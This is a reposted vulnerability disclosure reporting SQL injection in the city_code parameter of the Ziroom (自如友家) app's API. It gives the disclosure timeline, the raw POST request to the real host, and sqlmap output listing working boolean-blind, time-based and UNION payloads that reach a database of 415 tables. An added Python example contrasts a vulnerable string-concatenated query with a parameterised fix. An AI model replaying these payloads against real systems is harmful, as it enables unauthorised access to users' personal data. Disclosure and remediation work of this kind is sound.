神刀安全网

Vulnerability title: SQL injection in the 自如友家 (Ziroom) app exposes 415 tables and more than 1.98 million records

Vulnerability details

Disclosure status:

2016-04-22: Details sent to the vendor; awaiting vendor response
2016-04-22: Vendor confirmed the issue; details disclosed to the vendor only
2016-05-02: Details disclosed to core white hats and relevant domain experts
2016-05-12: Details disclosed to regular white hats
2016-05-22: Details disclosed to intern white hats
2016-06-06: Details disclosed to the public

Brief description:

SQL injection in the 自如友家 app; the affected database holds 415 tables and more than 1.98 million records.

Detailed description:

URL and parameters (the injectable parameter is city_code in the POST body):

POST /index.php?_p=api_mobile&_a=get_hotSearchWords HTTP/1.1
Content-Length: 190
Content-Type: application/x-www-form-urlencoded
Host: interfaces.ziroom.com
Connection: close
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

network=WIFI&sign=28d489fc766c0f3ab1ecb8daca16c14a&ip=192.168.100.33&uid=bffa0b4c-ba27-4014-88d7-22edb9cf357b&timestamp=1461314033&city_code=110000&app=v3.3.1&os=android%3A5.1&model=8681-A01

Proof of vulnerability (sqlmap output):

[*] starting at 16:55:01

[16:55:01] [INFO] parsing HTTP request from 'yy.txt'
[16:55:02] [INFO] resuming back-end DBMS 'mysql'
[16:55:02] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
Parameter: city_code (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: network=WIFI&sign=28d489fc766c0f3ab1ecb8daca16c14a&ip=192.168.147.33&uid=bffa0b4c-ba27-4014-88d7-22edb9cf357b&timestamp=1461314033&city_code=110000 AND 1153=1153&app=v3.3.1&os=android:5.1&model=8681-A01

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: network=WIFI&sign=28d489fc766c0f3ab1ecb8daca16c14a&ip=192.168.147.33&uid=bffa0b4c-ba27-4014-88d7-22edb9cf357b&timestamp=1461314033&city_code=110000 AND (SELECT * FROM (SELECT(SLEEP(5)))yfFI)&app=v3.3.1&os=android:5.1&model=8681-A01

    Type: UNION query
    Title: Generic UNION query (NULL) - 1 column
    Payload: network=WIFI&sign=28d489fc766c0f3ab1ecb8daca16c14a&ip=192.168.147.33&uid=bffa0b4c-ba27-4014-88d7-22edb9cf357b&timestamp=1461314033&city_code=110000 UNION ALL SELECT CONCAT(0x7170707071,0x57724b52437841506852734e69546e4a4b567079686d587a6b625754486470416377694a7a655373,0x71766b7171)– sKhk&app=v3.3.1&os=android:5.1&model=8681-A01

[16:55:02] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.4.22
back-end DBMS: MySQL 5.0.12
[16:55:02] [INFO] fetching tables for database: 'newziroom'
[16:55:02] [INFO] the SQL query used returns 415 entries
Database: newziroom
[415 tables]


[16:55:02] [INFO] fetched data logged to text files under


Fix recommendation:

Filter the parameters!
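The following is an added illustration, not code from the report or from the vendor's application: it reproduces the pattern behind the finding (the city_code request parameter concatenated into the WHERE clause, so "110000 AND 1153=1153" flips the result set exactly as sqlmap's boolean-based blind test relies on) next to the hardened handler that validates the parameter against an allowlist and binds it as a query parameter. An in-memory sqlite3 database and the table name hot_search_words stand in for the MySQL 'newziroom' schema, both assumptions.

```python
import re
import sqlite3


def make_db():
    # Constructed stand-in for the MySQL back end: sqlite3 in memory so the
    # example runs offline. Table and column names are assumptions.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE hot_search_words (city_code INTEGER, word TEXT)")
    db.executemany(
        "INSERT INTO hot_search_words VALUES (?, ?)",
        [(110000, "chaoyang"), (110000, "haidian"), (310000, "pudong")],
    )
    return db


def hot_words_vulnerable(db, city_code):
    # The defect the report describes: the raw request parameter becomes part
    # of the SQL text. 'city_code=110000 AND 1153=1153' keeps the rows,
    # 'city_code=110000 AND 1153=1154' drops them, so the attacker can read the
    # database one true/false question at a time (boolean-based blind).
    sql = ("SELECT word FROM hot_search_words WHERE city_code="
           + city_code + " ORDER BY word")
    return [row[0] for row in db.execute(sql)]


# Chinese administrative division codes, as used by city_code, are six digits.
CITY_CODE_RE = re.compile(r"[0-9]{6}")


def hot_words_fixed(db, city_code):
    # Hardened handler: (1) allowlist validation of the parameter's shape,
    # (2) a parameterised query, so the value is bound as data and can never
    # change the structure of the statement even if (1) were bypassed.
    if not CITY_CODE_RE.fullmatch(city_code):
        raise ValueError("invalid city_code")
    sql = "SELECT word FROM hot_search_words WHERE city_code=? ORDER BY word"
    return [row[0] for row in db.execute(sql, (int(city_code),))]
```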

Copyright notice: please credit the source when reposting: 路人甲@乌云
